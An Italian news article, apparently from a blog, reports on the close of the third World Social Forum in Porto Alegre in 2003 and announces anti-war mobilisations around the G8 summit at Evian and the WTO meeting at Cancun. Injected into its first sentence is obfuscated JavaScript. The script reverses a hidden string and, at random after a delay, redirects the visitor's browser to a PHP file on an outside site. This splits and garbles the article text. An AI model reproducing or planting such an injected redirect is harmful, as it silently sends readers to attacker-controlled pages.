WSF Porto Alegre 2003 – CHIUDE LA TERZA EDIZIONE WORLD SOCIAL FORUM. ECCO I PROSSIMI APPUNTAMENTI PER LA PACE

image_pdfimage_print

Dimostrazioni in 30 gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andi citta’ in tutto il mondo, e due grandi azioni dimostrative da organizzare a giugno in occasione del prossimo summit dei G8 convocato a Evian e nel settembre prossimo in occasione del vertice del Wto a Cancun, in Messico. Sono questi i prossimi appuntamenti di tutte le reti contro la guerra lanciati in occasione della chiusura dei lavori del III Social Forum mondiale di Porto Alegre. ”I movimenti sociali sono contro la militarizzazione, il proliferare delle basi militari e la repressione di stato che causa l’esodo di moltitudini di rifugiati e la criminalizzazione delle persone povere”, ha spiegato Nancy Lindisfarne di Globalise Resistance, che ha tenuto le fila del coordinamento in questi giorni e ha annunciato l’iniziativa. Un dato da segnalare: la delegazione statunitense, seconda per consistenza in questo Forum, ha assicurato il suo coinvolgimento nell’organizzazione di analoghe manifestazioni nelle principali citta’ degli Usa. Una mobilitazione, dunque, che non ha eguali dai tempi del Vietnam per ampiezza del dissenso, che dovrebbe spingere il presidente Bush a dilatare i tempi dell’attacco all’Iraq.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *